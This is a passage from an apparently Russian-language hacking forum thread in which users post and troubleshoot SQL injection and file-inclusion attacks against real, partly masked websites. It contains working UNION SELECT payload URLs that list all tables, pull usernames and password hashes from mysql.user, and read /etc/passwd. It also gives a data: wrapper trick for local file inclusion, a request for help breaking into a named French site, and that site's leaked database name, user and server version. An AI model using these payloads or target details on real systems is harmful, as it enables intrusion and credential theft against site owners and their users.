Старый 28.06.2011, 21:46   #1101
Zhenechka
 
Аватар для Zhenechka
 
Регистрация: 08.11.2010
Сообщений: 10
Репутация: 5
По умолчанию

All tables:
PHP код:
http://www.***.ru/search/?action=index&text=%27%29+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables--+ 
User:Password from mysql.user:
PHP код:
http://www.***.ru/search/?action=index&text=%27%29+union+select+1,2,concat_ws%280x3a,User,Password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user--+ 
/etc/passwd available:
PHP код:
http://www.***.ru/search/?action=index&text=')+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+ 
__________________
888

Последний раз редактировалось Twost; 17.05.2013 в 11:45..
Zhenechka вне форума   Ответить с цитированием
Старый 28.06.2011, 21:51   #1102
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

а еще там булка стоит...
Pashkela вне форума   Ответить с цитированием
Старый 28.06.2011, 21:53   #1103
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
а еще там булка стоит...
А так выводить еще лучше

http://www.***.ru/search/?action=index&text=-5')+union+select+1,2,3,(select(@x)from(select(@x:= 0x00),(select(null)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+&image.x=0&image.y=0

Последний раз редактировалось Twost; 17.05.2013 в 11:45..
Flakt вне форума   Ответить с цитированием
Старый 29.06.2011, 12:10   #1104
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

какие есть варианты обхода если точка "." заменяется на слэш "/" при lfi ? %2e%2e/ и пост не помогло (
525 вне форума   Ответить с цитированием
Старый 30.06.2011, 12:46   #1105
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

525, портокол data, не? Что-то такое:
Код:
site.com/index.php?page=data:application/x-httpd-php;base64,сюда_base64_того_что_инклудишь
Написал, а теперь подумал... а оно случаем не только на удалённом работает?
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 30.06.2011, 17:40   #1106
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

PHP 4 будет работать при allow_url_fopen=true (по умолчанию включено)
PHP 5 будет работать при allow_url_include=true (по умолчанию отключено)
Raz0r вне форума   Ответить с цитированием
Старый 30.06.2011, 23:23   #1107
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Помогите раскрутить скулю плз.
http://www.***.com/index.php?lang=FR&page_id=18+order+by+24--+
24 поля, но через union select кидает на пустую страницу. То ли фильтруется, то ли двойной запрос.
Проверить не могу, других уязвимых параметров так же не нашел. Интересует в первую очередь причина, ну и конечно методы, как раскрутить.
Так же прилагаю
http://***.com/phpinfo.php

Последний раз редактировалось Twost; 17.05.2013 в 11:46..
Consistent вне форума   Ответить с цитированием
Старый 30.06.2011, 23:39   #1108
napas_hd
 
Регистрация: 09.07.2010
Сообщений: 70
Репутация: 4
По умолчанию

Consistent, union и select фильтруются. POST не катит.
napas_hd вне форума   Ответить с цитированием
Старый 01.07.2011, 00:16   #1109
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Да, я уже опробовал. Оказывается и select from фильтруется, error based тож не заюзать. Жалко, версия пятая.
Спасибо.
Consistent вне форума   Ответить с цитированием
Старый 01.07.2011, 00:42   #1110
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Да, from фильтруется

@@basedir: /
@@datadir: /
version(): 5.0.90-community
@@version_compile_os: unknown-linux-gnu
database(): francoj1_francojobs
user(): francoj1_rhw@localhost
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot